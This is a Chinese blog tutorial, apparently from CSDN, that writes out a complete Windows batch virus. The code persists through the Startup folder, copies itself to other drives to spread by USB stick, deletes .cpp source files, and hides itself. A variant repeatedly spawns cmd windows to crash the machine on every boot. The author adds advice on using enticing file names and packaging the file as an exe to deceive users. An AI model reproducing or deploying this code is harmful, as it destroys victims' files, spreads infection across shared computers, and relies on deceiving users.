5行代码!完成bat病毒制作!!!

本文介绍了一个简单的bat病毒,该病毒会在开机自启动中运行,并删除当前目录下的.cpp文件。通过伪装文件名和利用U盘传播,病毒能够感染未安装杀毒软件的计算机。尽管被防火墙拦截,但对于某些环境仍构成威胁。作者提醒,增加隐蔽性和欺骗用户是病毒传播的关键。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

这个病毒的功能是删除当前目录下.cpp类型的代码。

copy %0 "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
copy %0 d:\
copy %0 e:\
del *.cpp
attrib +h %0

1.病毒启动测试:

copy %0 "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
%0是本文件
%userprofile%是当前用户的配置文件目录
\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup加到开机启动项里

将病毒加入到开机自启动中。

接着利用逆反心理设置一个有诱惑力的名字。(平时见到奇奇怪怪名字的软件千万不要下载。

2.病毒如何传染:

copy %0 d:\
copy %0 e:\
  • 通过copy语句复制到磁盘,假如在机房,就有拷贝到U盘的可能 ,之后U盘插入新电脑,看到名字,一双击,就又copy到了别的磁盘上。
  • 还有些病毒通过邮件传染

3.病毒目的:

del *.cpp

执行一个简单的删除文件操作,把.cpp类型的代码删光。

(当然我们还可以做些别的操作,比如一直启动cmd,电脑很快就会蓝屏的,一般来说重启就可以,但是因为把病毒加入到了开机自启动中,重启后立马又会弹出窗口。附上代码:

copy %0 "%userprofile%\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup"
copy %0 d:\
copy %0 e:\
start cmd
%0
attrib +h %0

4.隐蔽病毒:

attrib +h %0
Attrib -h显示隐藏
Attrib +h隐藏 
%0是文件本身

加个隐藏,执行后就不显示了。

总体来说,这个病毒还是非常简单的,复制到开机自启动的时候就被火绒拦了。

但是对于没有安装杀软的机房电脑来说就是致命打击。

当然,我们可以尝试换个名字,加点东西,或者打包成exe,不需要骗过杀软,只要能骗过用户就成功了。

结束。

评论 14
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

教书酱老张

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值